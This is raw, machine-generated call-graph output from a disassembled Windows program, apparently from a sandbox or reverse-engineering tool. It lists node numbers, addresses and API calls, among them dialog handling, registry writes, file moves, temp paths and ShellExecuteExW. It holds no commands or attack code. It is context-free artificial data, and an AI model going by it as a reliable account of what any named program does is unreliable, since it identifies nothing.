26697 7ff70e7af1f3 SendMessageW 26695->26697 26698 7ff70e7af218 SendMessageW 26695->26698 26696->26695 26697->26698 26699 7ff70e7b2320 _handle_error 8 API calls 26698->26699 26700 7ff70e7ab578 26699->26700 26700->26395 26702 7ff70e7afbad 26701->26702 26703 7ff70e7afab7 26701->26703 26704 7ff70e7b2320 _handle_error 8 API calls 26702->26704 26703->26702 27095 7ff70e7acdf8 26703->27095 26705 7ff70e7afbbe 26704->26705 26705->26398 26708 7ff70e7afb76 26708->26702 26711 7ff70e7afbd3 26708->26711 26709 7ff70e7afb2a RegSetValueExW RegCloseKey 26709->26708 26712 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26711->26712 26713 7ff70e7afbd8 26712->26713 26715 7ff70e79309d 26714->26715 26722 7ff70e792f8e 26714->26722 26716 7ff70e7b2320 _handle_error 8 API calls 26715->26716 26717 7ff70e7930b3 26716->26717 26717->26428 26717->26429 26718 7ff70e793077 26718->26715 26719 7ff70e793684 56 API calls 26718->26719 26719->26715 26720 7ff70e78129c 33 API calls 26720->26722 26722->26718 26722->26720 26723 7ff70e7930c8 26722->26723 27099 7ff70e793684 26722->27099 26724 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26723->26724 26725 7ff70e7930cd 26724->26725 26727 7ff70e797fcf 26726->26727 26728 7ff70e797fd2 SetCurrentDirectoryW 26726->26728 26727->26728 26728->26445 26730 7ff70e784255 26729->26730 26731 7ff70e78426a 26730->26731 26732 7ff70e78129c 33 API calls 26730->26732 26733 7ff70e7b2320 _handle_error 8 API calls 26731->26733 26732->26731 26734 7ff70e7842a1 26733->26734 26735 7ff70e783c84 26734->26735 26736 7ff70e783cab 26735->26736 27232 7ff70e78710c 26736->27232 26738 7ff70e783cbb memcpy_s 26738->26481 26742 7ff70e79216a 26739->26742 26740 7ff70e79219e 26743 7ff70e796a0c 49 API calls 26740->26743 26751 7ff70e79227f 26740->26751 26741 7ff70e7921b1 CreateFileW 26741->26740 26742->26740 26742->26741 26746 7ff70e792209 26743->26746 26744 7ff70e7922af 26745 7ff70e7b2320 _handle_error 8 API calls 26744->26745 26748 7ff70e7922c4 26745->26748 26749 7ff70e792246 26746->26749 26750 7ff70e79220d CreateFileW 26746->26750 26747 7ff70e7820b0 33 API calls 26747->26744 26748->26525 26748->26526 26749->26751 26752 7ff70e7922d8 26749->26752 26750->26749 26751->26744 26751->26747 26753 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26752->26753 26754 7ff70e7922dd 26753->26754 26756 7ff70e792066 26755->26756 26758 7ff70e792072 26755->26758 26756->26758 27244 7ff70e7920d0 26756->27244 27251 7ff70e7aaa08 26759->27251 26761 7ff70e7ad1ee 26762 7ff70e781fa0 31 API calls 26761->26762 26763 7ff70e7ad1f7 26762->26763 26764 7ff70e7b2320 _handle_error 8 API calls 26763->26764 26766 7ff70e7abc2b 26764->26766 26765 7ff70e79d22c 33 API calls 26897 7ff70e7acf03 memcpy_s 26765->26897 26766->26534 26767 7ff70e7aeefa 27419 7ff70e78704c 47 API calls memcpy_s 26767->27419 26770 7ff70e7aef00 27420 7ff70e78704c 47 API calls memcpy_s 26770->27420 26772 7ff70e7aef06 26776 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26772->26776 26774 7ff70e7aeeee 26775 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26774->26775 26777 7ff70e7aeef4 26775->26777 26778 7ff70e7aef0c 26776->26778 27418 7ff70e78704c 47 API calls memcpy_s 26777->27418 26781 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26778->26781 26782 7ff70e7aef12 26781->26782 26786 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26782->26786 26783 7ff70e7820b0 33 API calls 26788 7ff70e7aee77 26783->26788 26784 7ff70e7aeee8 27417 7ff70e782004 33 API calls std::_Xinvalid_argument 26784->27417 26785 7ff70e7813a4 33 API calls 26789 7ff70e7adc3a GetTempPathW 26785->26789 26790 7ff70e7aef18 26786->26790 27415 7ff70e7aabe8 33 API calls 3 library calls 26788->27415 26789->26897 26797 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26790->26797 26791 7ff70e7962dc 35 API calls 26791->26897 26794 7ff70e7bbb8c 43 API calls 26794->26897 26796 7ff70e782520 SetWindowTextW 26796->26897 26802 7ff70e7aef1e 26797->26802 26800 7ff70e7ae7f3 26800->26784 26807 7ff70e7b21d0 33 API calls 26800->26807 26809 7ff70e7aeed2 26800->26809 26818 7ff70e7ae83b memcpy_s 26800->26818 26801 7ff70e7aee8d 26805 7ff70e781fa0 31 API calls 26801->26805 26808 7ff70e7aeea4 memcpy_s 26801->26808 26810 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26802->26810 26803 7ff70e782034 33 API calls 26803->26897 26804 7ff70e788d04 33 API calls 26804->26897 26805->26808 26806 7ff70e781fa0 31 API calls 26806->26809 26807->26818 26808->26806 27416 7ff70e781f80 33 API calls 3 library calls 26809->27416 26813 7ff70e7aef24 26810->26813 26811 7ff70e7820b0 33 API calls 26811->26897 26812 7ff70e7aaa08 33 API calls 26812->26897 26816 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26813->26816 26815 7ff70e7aef6c 27423 7ff70e782004 33 API calls std::_Xinvalid_argument 26815->27423 26822 7ff70e7aef2a 26816->26822 26817 7ff70e793f30 54 API calls 26817->26897 26827 7ff70e7820b0 33 API calls 26818->26827 26866 7ff70e7aeb8f 26818->26866 26820 7ff70e781fa0 31 API calls 26825 7ff70e7aee4a 26820->26825 26821 7ff70e7aef78 27425 7ff70e782004 33 API calls std::_Xinvalid_argument 26821->27425 26832 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26822->26832 26823 7ff70e7aef72 27424 7ff70e781f80 33 API calls 3 library calls 26823->27424 26825->26783 26825->26809 26826 7ff70e7aef66 27422 7ff70e781f80 33 API calls 3 library calls 26826->27422 26833 7ff70e7ae963 26827->26833 26831 7ff70e7aec2a 26831->26815 26831->26826 26840 7ff70e7aec72 memcpy_s 26831->26840 26845 7ff70e7aed3b memcpy_s 26831->26845 26847 7ff70e7b21d0 33 API calls 26831->26847 26837 7ff70e7aef30 26832->26837 26839 7ff70e7aef60 26833->26839 26846 7ff70e78129c 33 API calls 26833->26846 26836 7ff70e7aed40 26836->26821 26836->26823 26836->26845 26851 7ff70e7b21d0 33 API calls 26836->26851 26852 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26837->26852 26838 7ff70e793d34 51 API calls 26838->26897 27421 7ff70e78704c 47 API calls memcpy_s 26839->27421 27314 7ff70e7af4e0 26840->27314 26842 7ff70e7ad5e9 GetDlgItem 26848 7ff70e782520 SetWindowTextW 26842->26848 26844 7ff70e7a99c8 31 API calls 26844->26897 26845->26820 26853 7ff70e7ae9a6 26846->26853 26847->26840 26854 7ff70e7ad608 SendMessageW 26848->26854 26851->26845 26856 7ff70e7aef36 26852->26856 27411 7ff70e79d22c 26853->27411 26854->26897 26855 7ff70e79dc2c 33 API calls 26855->26897 26862 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26856->26862 26859 7ff70e795b60 53 API calls 26859->26897 26860 7ff70e781fa0 31 API calls 26860->26897 26861 7ff70e782674 31 API calls 26861->26897 26865 7ff70e7aef3c 26862->26865 26863 7ff70e795aa8 33 API calls 26863->26897 26864 7ff70e7ad63c SendMessageW 26864->26897 26870 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26865->26870 26866->26831 26866->26836 26873 7ff70e7aef54 26866->26873 26875 7ff70e7aef5a 26866->26875 26874 7ff70e7aef42 26870->26874 26872 7ff70e78129c 33 API calls 26898 7ff70e7ae9d1 26872->26898 26876 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26873->26876 26880 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26874->26880 26879 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26875->26879 26876->26875 26877 7ff70e784228 33 API calls 26877->26897 26879->26839 26883 7ff70e7aef48 26880->26883 26881 7ff70e795820 33 API calls 26881->26897 26882 7ff70e7932a8 51 API calls 26882->26897 26885 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26883->26885 26884 7ff70e78e164 33 API calls 26884->26897 26887 7ff70e7aef4e 26885->26887 26886 7ff70e78250c SetDlgItemTextW 26886->26897 26891 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26887->26891 26889 7ff70e781150 33 API calls 26889->26897 26891->26873 26892 7ff70e7a13c4 CompareStringW 26892->26898 26894 7ff70e781fa0 31 API calls 26894->26898 26895 7ff70e78129c 33 API calls 26895->26897 26897->26761 26897->26765 26897->26767 26897->26770 26897->26772 26897->26774 26897->26777 26897->26778 26897->26782 26897->26785 26897->26790 26897->26791 26897->26794 26897->26796 26897->26800 26897->26802 26897->26803 26897->26804 26897->26811 26897->26812 26897->26813 26897->26817 26897->26822 26897->26825 26897->26837 26897->26838 26897->26844 26897->26855 26897->26856 26897->26859 26897->26860 26897->26861 26897->26863 26897->26864 26897->26865 26897->26874 26897->26877 26897->26881 26897->26882 26897->26884 26897->26886 26897->26889 26897->26895 26899 7ff70e7adf99 EndDialog 26897->26899 26901 7ff70e7932bc 51 API calls 26897->26901 26903 7ff70e7adb21 MoveFileW 26897->26903 26907 7ff70e792f58 56 API calls 26897->26907 27255 7ff70e7a13c4 CompareStringW 26897->27255 27256 7ff70e7aa440 26897->27256 27294 7ff70e797368 26897->27294 27310 7ff70e794088 26897->27310 27352 7ff70e79cfa4 35 API calls _invalid_parameter_noinfo_noreturn 26897->27352 27353 7ff70e7a95b4 33 API calls Concurrency::cancel_current_task 26897->27353 27354 7ff70e7b0684 31 API calls _invalid_parameter_noinfo_noreturn 26897->27354 27355 7ff70e78df4c 47 API calls memcpy_s 26897->27355 27356 7ff70e7aa834 26897->27356 27374 7ff70e7a9518 33 API calls 26897->27374 27375 7ff70e7aabe8 33 API calls 3 library calls 26897->27375 27376 7ff70e7965b0 33 API calls 3 library calls 26897->27376 27377 7ff70e7972cc 26897->27377 27381 7ff70e781744 33 API calls 4 library calls 26897->27381 27382 7ff70e7931bc 26897->27382 27396 7ff70e793ea0 FindClose 26897->27396 27397 7ff70e7a13f4 CompareStringW 26897->27397 27398 7ff70e7a9cd0 47 API calls 26897->27398 27399 7ff70e7a87d8 51 API calls 3 library calls 26897->27399 27400 7ff70e7aab54 33 API calls _handle_error 26897->27400 27401 7ff70e797df4 26897->27401 27409 7ff70e795b08 CompareStringW 26897->27409 27410 7ff70e797eb0 47 API calls 26897->27410 26898->26866 26898->26872 26898->26883 26898->26887 26898->26892 26898->26894 26902 7ff70e79d22c 33 API calls 26898->26902 26899->26897 26901->26897 26902->26898 26904 7ff70e7adb70 26903->26904 26905 7ff70e7adb55 MoveFileExW 26903->26905 26904->26897 26906 7ff70e781fa0 31 API calls 26904->26906 26905->26904 26906->26904 26907->26897 26910 7ff70e7af9a3 26909->26910 26911 7ff70e7820b0 33 API calls 26910->26911 26912 7ff70e7af9b9 26911->26912 26913 7ff70e7af9ee 26912->26913 26914 7ff70e7820b0 33 API calls 26912->26914 27439 7ff70e78e34c 26913->27439 26914->26913 26916 7ff70e7afa4b 27459 7ff70e78e7a8 26916->27459 26920 7ff70e7afa61 26921 7ff70e7b2320 _handle_error 8 API calls 26920->26921 26922 7ff70e7abc52 26921->26922 26922->26550 28603 7ff70e7a849c 26924->28603 26927 7ff70e7af4b7 26929 7ff70e7b2320 _handle_error 8 API calls 26927->26929 26928 7ff70e7af3c7 GetWindow 26933 7ff70e7af3e2 26928->26933 26930 7ff70e7abe9b 26929->26930 26930->26309 26930->26310 26931 7ff70e7af3ee GetClassNameW 28608 7ff70e7a13c4 CompareStringW 26931->28608 26933->26927 26933->26931 26934 7ff70e7af496 GetWindow 26933->26934 26935 7ff70e7af417 GetWindowLongPtrW 26933->26935 26934->26927 26934->26933 26935->26934 26936 7ff70e7af429 SendMessageW 26935->26936 26936->26934 26937 7ff70e7af445 GetObjectW 26936->26937 28609 7ff70e7a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26937->28609 26939 7ff70e7af461 28610 7ff70e7a84cc 26939->28610 28614 7ff70e7a8df4 16 API calls _handle_error 26939->28614 26942 7ff70e7af479 SendMessageW DeleteObject 26942->26934 26944 7ff70e796300 26943->26944 26949 7ff70e79638d 26943->26949 26945 7ff70e7813a4 33 API calls 26944->26945 26946 7ff70e79631b GetCurrentDirectoryW 26945->26946 26947 7ff70e796341 26946->26947 26948 7ff70e7820b0 33 API calls 26947->26948 26950 7ff70e79634f 26948->26950 26949->26323 26950->26949 26951 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26950->26951 26952 7ff70e7963a9 26951->26952 26954 7ff70e78252a SetWindowTextW 26953->26954 26955 7ff70e782527 26953->26955 26956 7ff70e7ee2e0 26954->26956 26955->26954 26957->26333 26961 7ff70e7812d0 26958->26961 26966 7ff70e78139b 26958->26966 26962 7ff70e781338 26961->26962 26963 7ff70e781396 26961->26963 26965 7ff70e7812de memcpy_s 26961->26965 26962->26965 26967 7ff70e7b21d0 33 API calls 26962->26967 28617 7ff70e781f80 33 API calls 3 library calls 26963->28617 26965->26370 28618 7ff70e782004 33 API calls std::_Xinvalid_argument 26966->28618 26967->26965 26969 7ff70e7932bc 51 API calls 26968->26969 26970 7ff70e7932b1 26969->26970 26970->26411 26970->26434 26971->26411 26973 7ff70e7813a4 33 API calls 26972->26973 26974 7ff70e796489 26973->26974 26975 7ff70e79648c GetModuleFileNameW 26974->26975 26978 7ff70e7964dc 26974->26978 26976 7ff70e7964a7 26975->26976 26977 7ff70e7964de 26975->26977 26976->26974 26977->26978 26979 7ff70e78129c 33 API calls 26978->26979 26981 7ff70e796506 26979->26981 26980 7ff70e79653e 26980->26479 26981->26980 26982 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26981->26982 26983 7ff70e796560 26982->26983 26984->26494 26986 7ff70e7820f6 26985->26986 26988 7ff70e7820cb memcpy_s 26985->26988 28619 7ff70e781474 33 API calls 3 library calls 26986->28619 26988->26512 26989->26524 26990->26532 26991->26542 26992->26547 26993->26557 26995 7ff70e7b3620 26994->26995 26995->26561 26996->26476 26998 7ff70e781177 26997->26998 26999 7ff70e782034 33 API calls 26998->26999 27000 7ff70e781185 memcpy_s 26999->27000 27000->26492 27002 7ff70e782085 27001->27002 27004 7ff70e782059 memcpy_s 27001->27004 28620 7ff70e7815b8 33 API calls 3 library calls 27002->28620 27004->26463 27005->26518 27006->26581 27007->26606 27008->26621 27009->26633 27035 7ff70e793e28 27010->27035 27013 7ff70e7a0f68 WideCharToMultiByte 27014 7ff70e79a519 27013->27014 27015 7ff70e79a589 27014->27015 27029 7ff70e799800 31 API calls 27014->27029 27033 7ff70e79a56a SetDlgItemTextW 27014->27033 27039 7ff70e799408 27015->27039 27018 7ff70e79a6f2 GetSystemMetrics GetWindow 27022 7ff70e79a821 27018->27022 27032 7ff70e79a71d 27018->27032 27019 7ff70e79a603 27020 7ff70e79a6c2 27019->27020 27021 7ff70e79a60c GetWindowLongPtrW 27019->27021 27054 7ff70e7995a8 27020->27054 27024 7ff70e7ee2c0 27021->27024 27023 7ff70e7b2320 _handle_error 8 API calls 27022->27023 27026 7ff70e79a830 27023->27026 27027 7ff70e79a6aa GetWindowRect 27024->27027 27026->26645 27027->27020 27029->27014 27030 7ff70e79a6e5 SetWindowTextW 27030->27018 27031 7ff70e79a73e GetWindowRect 27031->27032 27032->27022 27032->27031 27034 7ff70e79a800 GetWindow 27032->27034 27033->27014 27034->27022 27034->27032 27036 7ff70e793e4d swprintf 27035->27036 27037 7ff70e7b9ef0 swprintf 46 API calls 27036->27037 27038 7ff70e793e69 27037->27038 27038->27013 27040 7ff70e7995a8 47 API calls 27039->27040 27043 7ff70e79944f 27040->27043 27041 7ff70e79955a 27042 7ff70e7b2320 _handle_error 8 API calls 27041->27042 27044 7ff70e79958e GetWindowRect GetClientRect 27042->27044 27043->27041 27045 7ff70e78129c 33 API calls 27043->27045 27044->27018 27044->27019 27046 7ff70e79949c 27045->27046 27047 7ff70e7995a1 27046->27047 27048 7ff70e78129c 33 API calls 27046->27048 27049 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27047->27049 27051 7ff70e799514 27048->27051 27050 7ff70e7995a7 27049->27050 27051->27041 27052 7ff70e79959c 27051->27052 27053 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27052->27053 27053->27047 27055 7ff70e793e28 swprintf 46 API calls 27054->27055 27056 7ff70e7995eb 27055->27056 27057 7ff70e7a0f68 WideCharToMultiByte 27056->27057 27058 7ff70e799603 27057->27058 27059 7ff70e799800 31 API calls 27058->27059 27060 7ff70e79961b 27059->27060 27061 7ff70e7b2320 _handle_error 8 API calls 27060->27061 27062 7ff70e79962b 27061->27062 27062->27018 27062->27030 27075 7ff70e7813a4 27063->27075 27066 7ff70e782494 27067 7ff70e78129c 33 API calls 27066->27067 27069 7ff70e7824a2 27067->27069 27068 7ff70e7824dd 27070 7ff70e7b2320 _handle_error 8 API calls 27068->27070 27069->27068 27071 7ff70e782505 27069->27071 27072 7ff70e7824f3 27070->27072 27073 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27071->27073 27072->26654 27074 7ff70e78250a 27073->27074 27076 7ff70e7813ad 27075->27076 27084 7ff70e78142d GetWindowTextW 27075->27084 27077 7ff70e78143d 27076->27077 27079 7ff70e7813ce 27076->27079 27086 7ff70e782018 33 API calls std::_Xinvalid_argument 27077->27086 27081 7ff70e7b21d0 33 API calls 27079->27081 27082 7ff70e7813db __scrt_get_show_window_mode 27079->27082 27081->27082 27085 7ff70e78197c 31 API calls _invalid_parameter_noinfo_noreturn 27082->27085 27084->27066 27085->27084 27087->26671 27089->26679 27091 7ff70e7aae80 GetDlgItem 27090->27091 27092 7ff70e7aae3c GetMessageW 27090->27092 27091->26690 27091->26691 27093 7ff70e7aae6a TranslateMessage DispatchMessageW 27092->27093 27094 7ff70e7aae5b IsDialogMessageW 27092->27094 27093->27091 27094->27091 27094->27093 27096 7ff70e7ace1f RegCreateKeyExW 27095->27096 27097 7ff70e7ace06 27095->27097 27096->26708 27096->26709 27098 7ff70e7820b0 33 API calls 27097->27098 27098->27096 27101 7ff70e7936b3 27099->27101 27100 7ff70e7936e0 27119 7ff70e7932bc 27100->27119 27101->27100 27102 7ff70e7936cc CreateDirectoryW 27101->27102 27102->27100 27104 7ff70e79377d 27102->27104 27108 7ff70e79378d 27104->27108 27133 7ff70e793d34 27104->27133 27106 7ff70e793791 GetLastError 27106->27108 27110 7ff70e7b2320 _handle_error 8 API calls 27108->27110 27112 7ff70e7937b9 27110->27112 27112->26722 27113 7ff70e793720 CreateDirectoryW 27114 7ff70e79373b 27113->27114 27115 7ff70e793774 27114->27115 27116 7ff70e7937ce 27114->27116 27115->27104 27115->27106 27117 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27116->27117 27118 7ff70e7937d3 27117->27118 27120 7ff70e7932e4 27119->27120 27121 7ff70e7932e7 GetFileAttributesW 27119->27121 27120->27121 27122 7ff70e7932f8 27121->27122 27129 7ff70e793375 27121->27129 27124 7ff70e796a0c 49 API calls 27122->27124 27123 7ff70e7b2320 _handle_error 8 API calls 27125 7ff70e793389 27123->27125 27126 7ff70e79331f 27124->27126 27125->27106 27147 7ff70e796a0c 27125->27147 27127 7ff70e793323 GetFileAttributesW 27126->27127 27128 7ff70e79333c 27126->27128 27127->27128 27128->27129 27130 7ff70e793399 27128->27130 27129->27123 27131 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27130->27131 27132 7ff70e79339e 27131->27132 27134 7ff70e793d5b 27133->27134 27135 7ff70e793d5e SetFileAttributesW 27133->27135 27134->27135 27136 7ff70e793d74 27135->27136 27137 7ff70e793df5 27135->27137 27139 7ff70e796a0c 49 API calls 27136->27139 27138 7ff70e7b2320 _handle_error 8 API calls 27137->27138 27140 7ff70e793e0a 27138->27140 27141 7ff70e793d99 27139->27141 27140->27108 27142 7ff70e793dbc 27141->27142 27143 7ff70e793d9d SetFileAttributesW 27141->27143 27142->27137 27144 7ff70e793e1a 27142->27144 27143->27142 27145 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27144->27145 27146 7ff70e793e1f 27145->27146 27148 7ff70e796a4b 27147->27148 27162 7ff70e796a44 27147->27162 27150 7ff70e78129c 33 API calls 27148->27150 27149 7ff70e7b2320 _handle_error 8 API calls 27151 7ff70e79371c 27149->27151 27152 7ff70e796a76 27150->27152 27151->27113 27151->27114 27153 7ff70e796a96 27152->27153 27154 7ff70e796cc7 27152->27154 27156 7ff70e796ab0 27153->27156 27180 7ff70e796b49 27153->27180 27155 7ff70e7962dc 35 API calls 27154->27155 27160 7ff70e796ce6 27155->27160 27157 7ff70e7970ab 27156->27157 27220 7ff70e78c098 33 API calls 2 library calls 27156->27220 27228 7ff70e782004 33 API calls std::_Xinvalid_argument 27157->27228 27159 7ff70e796eef 27164 7ff70e7970cf 27159->27164 27225 7ff70e78c098 33 API calls 2 library calls 27159->27225 27160->27159 27165 7ff70e796d1b 27160->27165 27218 7ff70e796b44 27160->27218 27161 7ff70e7970b1 27171 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27161->27171 27162->27149 27231 7ff70e782004 33 API calls std::_Xinvalid_argument 27164->27231 27170 7ff70e7970bd 27165->27170 27223 7ff70e78c098 33 API calls 2 library calls 27165->27223 27166 7ff70e7970d5 27172 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27166->27172 27168 7ff70e796b03 27181 7ff70e781fa0 31 API calls 27168->27181 27186 7ff70e796b15 memcpy_s 27168->27186 27229 7ff70e782004 33 API calls std::_Xinvalid_argument 27170->27229 27178 7ff70e7970b7 27171->27178 27179 7ff70e7970db 27172->27179 27173 7ff70e7970a6 27177 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27173->27177 27174 7ff70e796f56 27226 7ff70e7811cc 33 API calls memcpy_s 27174->27226 27177->27157 27188 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27178->27188 27190 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27179->27190 27185 7ff70e78129c 33 API calls 27180->27185 27180->27218 27181->27186 27183 7ff70e7970c3 27193 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27183->27193 27184 7ff70e781fa0 31 API calls 27184->27218 27191 7ff70e796bbe 27185->27191 27186->27184 27187 7ff70e796f69 27227 7ff70e7957ac 33 API calls memcpy_s 27187->27227 27188->27170 27189 7ff70e781fa0 31 API calls 27204 7ff70e796df5 27189->27204 27196 7ff70e7970e1 27190->27196 27221 7ff70e795820 33 API calls 27191->27221 27194 7ff70e7970c9 27193->27194 27230 7ff70e78704c 47 API calls memcpy_s 27194->27230 27195 7ff70e796d76 memcpy_s 27195->27183 27195->27189 27198 7ff70e796bd3 27222 7ff70e78e164 33 API calls 2 library calls 27198->27222 27200 7ff70e781fa0 31 API calls 27203 7ff70e796fec 27200->27203 27202 7ff70e796f79 memcpy_s 27202->27179 27202->27200 27205 7ff70e781fa0 31 API calls 27203->27205 27209 7ff70e796e21 27204->27209 27224 7ff70e781744 33 API calls 4 library calls 27204->27224 27208 7ff70e796ff6 27205->27208 27207 7ff70e781fa0 31 API calls 27212 7ff70e796c6d 27207->27212 27213 7ff70e781fa0 31 API calls 27208->27213 27209->27194 27210 7ff70e78129c 33 API calls 27209->27210 27214 7ff70e796ec2 27210->27214 27211 7ff70e796be9 memcpy_s 27211->27178 27211->27207 27215 7ff70e781fa0 31 API calls 27212->27215 27213->27218 27216 7ff70e782034 33 API calls 27214->27216 27215->27218 27217 7ff70e796edf 27216->27217 27219 7ff70e781fa0 31 API calls 27217->27219 27218->27161 27218->27162 27218->27166 27218->27173 27219->27218 27220->27168 27221->27198 27222->27211 27223->27195 27224->27209 27225->27174 27226->27187 27227->27202 27230->27164 27233 7ff70e78713b 27232->27233 27234 7ff70e787206 27232->27234 27238 7ff70e78714b memcpy_s 27233->27238 27241 7ff70e783f48 33 API calls 2 library calls 27233->27241 27242 7ff70e78704c 47 API calls memcpy_s 27234->27242 27236 7ff70e78720b 27239 7ff70e787273 27236->27239 27243 7ff70e78889c 8 API calls memcpy_s 27236->27243 27238->26738 27239->26738 27241->27238 27242->27236 27243->27236 27245 7ff70e792102 27244->27245 27246 7ff70e7920ea 27244->27246 27247 7ff70e792126 27245->27247 27250 7ff70e78b544 99 API calls 27245->27250 27246->27245 27248 7ff70e7920f6 CloseHandle 27246->27248 27247->26758 27248->27245 27250->27247 27252 7ff70e7aaa2f 27251->27252 27253 7ff70e7aaa36 27251->27253 27252->26897 27253->27252 27426 7ff70e781744 33 API calls 4 library calls 27253->27426 27255->26897 27257 7ff70e7aa47f 27256->27257 27277 7ff70e7aa706 27256->27277 27258 7ff70e7acdf8 33 API calls 27257->27258 27260 7ff70e7aa49e 27258->27260 27259 7ff70e7b2320 _handle_error 8 API calls 27261 7ff70e7aa717 27259->27261 27262 7ff70e78129c 33 API calls 27260->27262 27261->26842 27263 7ff70e7aa4de 27262->27263 27264 7ff70e78129c 33 API calls 27263->27264 27265 7ff70e7aa517 27264->27265 27266 7ff70e78129c 33 API calls 27265->27266 27267 7ff70e7aa54a 27266->27267 27268 7ff70e7aa834 35 API calls 27267->27268 27273 7ff70e7aa573 27268->27273 27269 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27270 7ff70e7aa73a 27269->27270 27271 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27270->27271 27272 7ff70e7aa740 27271->27272 27274 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27272->27274 27273->27270 27273->27272 27275 7ff70e7820b0 33 API calls 27273->27275 27276 7ff70e7aa685 27273->27276 27284 7ff70e7aa734 27273->27284 27278 7ff70e7aa746 27274->27278 27275->27276 27276->27277 27276->27278 27279 7ff70e7aa72f 27276->27279 27277->27259 27280 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27278->27280 27282 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27279->27282 27281 7ff70e7aa74c 27280->27281 27283 7ff70e78255c 61 API calls 27281->27283 27282->27284 27285 7ff70e7aa795 27283->27285 27284->27269 27286 7ff70e7aa7b1 27285->27286 27287 7ff70e7aa801 SetDlgItemTextW 27285->27287 27291 7ff70e7aa7a1 27285->27291 27288 7ff70e7b2320 _handle_error 8 API calls 27286->27288 27287->27286 27289 7ff70e7aa827 27288->27289 27289->26842 27290 7ff70e7aa7ad 27290->27286 27292 7ff70e7aa7b7 EndDialog 27290->27292 27291->27286 27291->27290 27427 7ff70e79bb00 102 API calls 27291->27427 27292->27286 27295 7ff70e7973a6 27294->27295 27296 7ff70e788d04 33 API calls 27295->27296 27298 7ff70e7973b6 27296->27298 27297 7ff70e7973f7 27299 7ff70e782034 33 API calls 27297->27299 27298->27297 27428 7ff70e781744 33 API calls 4 library calls 27298->27428 27301 7ff70e79743d 27299->27301 27302 7ff70e797460 27301->27302 27303 7ff70e7820b0 33 API calls 27301->27303 27304 7ff70e797498 27302->27304 27306 7ff70e7974b4 27302->27306 27303->27302 27305 7ff70e7b2320 _handle_error 8 API calls 27304->27305 27307 7ff70e7974a9 27305->27307 27308 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27306->27308 27307->26897 27309 7ff70e7974b9 27308->27309 27311 7ff70e7940af 27310->27311 27312 7ff70e794096 27310->27312 27311->26897 27313 7ff70e7820b0 33 API calls 27312->27313 27313->27311 27319 7ff70e7af529 __scrt_get_show_window_mode 27314->27319 27330 7ff70e7af87d 27314->27330 27315 7ff70e781fa0 31 API calls 27316 7ff70e7af89c 27315->27316 27317 7ff70e7b2320 _handle_error 8 API calls 27316->27317 27318 7ff70e7af8a8 27317->27318 27318->26845 27321 7ff70e7af684 27319->27321 27429 7ff70e7a13c4 CompareStringW 27319->27429 27322 7ff70e78129c 33 API calls 27321->27322 27323 7ff70e7af6c0 27322->27323 27324 7ff70e7932a8 51 API calls 27323->27324 27325 7ff70e7af6ca 27324->27325 27326 7ff70e781fa0 31 API calls 27325->27326 27329 7ff70e7af6d5 27326->27329 27327 7ff70e7af742 ShellExecuteExW 27328 7ff70e7af846 27327->27328 27334 7ff70e7af755 27327->27334 27328->27330 27336 7ff70e7af8fb 27328->27336 27329->27327 27332 7ff70e78129c 33 API calls 27329->27332 27330->27315 27331 7ff70e7af78e 27431 7ff70e7afe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27331->27431 27335 7ff70e7af717 27332->27335 27333 7ff70e7af7e3 CloseHandle 27338 7ff70e7af7f2 27333->27338 27339 7ff70e7af801 27333->27339 27334->27331 27334->27333 27343 7ff70e7af781 ShowWindow 27334->27343 27430 7ff70e795b60 53 API calls 2 library calls 27335->27430 27337 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27336->27337 27341 7ff70e7af900 27337->27341 27432 7ff70e7a13c4 CompareStringW 27338->27432 27339->27328 27348 7ff70e7af837 ShowWindow 27339->27348 27343->27331 27345 7ff70e7af725 27347 7ff70e781fa0 31 API calls 27345->27347 27346 7ff70e7af7a6 27346->27333 27350 7ff70e7af7b4 GetExitCodeProcess 27346->27350 27349 7ff70e7af72f 27347->27349 27348->27328 